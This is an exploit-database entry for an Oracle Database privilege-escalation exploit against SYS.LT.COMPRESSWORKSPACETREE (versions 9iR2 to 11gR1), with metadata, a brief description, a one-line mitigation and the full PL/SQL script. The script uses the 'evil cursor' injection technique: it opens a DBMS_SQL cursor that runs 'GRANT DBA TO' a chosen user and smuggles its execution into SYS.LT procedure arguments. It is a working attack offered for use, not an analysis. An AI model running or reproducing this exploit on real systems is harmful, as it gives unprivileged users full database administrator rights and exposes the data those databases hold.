sys-lt-compressworkspacetreeV2.sql exploit

vendor:

Oracle Database

by:

Andrea 'bunker' Purificato

8.8

CVSS

HIGH

Oracle SYS.LT.COMPRESSWORKSPACETREE exploit

264

CWE

Product Name: Oracle Database

Affected Version From: 9iR2/10gR1

Affected Version To: 11gR1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

sys-lt-compressworkspacetreeV2.sql exploit

This exploit grants DBA permission to an unprivileged user by using the Evil cursor technique. It creates an evil cursor and then uses the SYS.LT.CREATEWORKSPACE and SYS.LT.COMPRESSWORKSPACETREE functions to execute the malicious code.

Mitigation:

Restrict access to the SYS.LT.CREATEWORKSPACE and SYS.LT.COMPRESSWORKSPACETREE functions.

Source

Exploit-DB raw data:

-- 
-- sys-lt-compressworkspacetreeV2.sql
--
--
-- Oracle SYS.LT.COMPRESSWORKSPACETREE exploit (9iR2/10gR1,10gR2,11gR1)
-- Evil cursor technique
--
-- Grant dba permission to unprivileged user
-- 
-- 
-- REF: http://www.google.it/search?q=SYS.LT.COMPRESSWORKSPACETREE
-- 
-- AUTHOR: Andrea "bunker" Purificato
-- http://rawlab.mindcreations.com
--
--
set serveroutput on;
prompt [+] sys-lt-compressworkspacetreeV2.sql exploit
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
prompt
prompt [-] Creating evil cursor...

DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction;begin execute immediate ''GRANT DBA TO &the_user'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('x''||dbms_sql.execute('||MYC||')||''--');
SYS.LT.COMPRESSWORKSPACETREE('x''||dbms_sql.execute('||MYC||')||''--'); 
END;
/

prompt [-] YOU GOT THE POWAH!!